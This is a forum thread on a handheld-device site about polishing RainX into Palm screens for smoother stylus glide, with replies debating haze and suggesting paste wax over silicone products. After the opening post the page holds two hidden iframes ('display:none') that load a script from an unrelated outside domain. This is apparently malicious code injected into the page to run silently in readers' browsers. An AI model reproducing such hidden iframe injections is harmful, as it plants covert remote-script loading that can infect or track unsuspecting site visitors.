+ Reply to Thread

Make Your Stylus Glide

Here's a method used on Palms to make the stylus glide more smoothly over the screen, improving graffiti recognition and feel - especially good if you've applied a protector like WriteRights.

Apply a drop or two of RainX (get it at any auto parts store) to a cloth and gently polish it into the screen. The stylus will be noticeably smoother in feel. Lasts for weeks too.

I use it on all my handhelds with no damage whatsoever.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

doesnt that leave a slight "rainbow" effect or haze on your screen under certain lighting conditions?

Not at all.

thanks for the tip i will definately give it a try!

I would be very careful using a silicon-based product on your screen. I use to talk with Dale McAdams (founder of Concept Kitchen - WriteRights) about different ways to make the screen smoother & heal scratches. He had extensive research showing how silicon can destroy a screen. I was using paste wax on my screen which worked very well. He said this would not hurt the screen at all. I would recommend paste wax instead of Rain X.

Sorry. I forgot to mention that I use WriteRights and actually apply RainX to the screen protector with never any noticeable damage.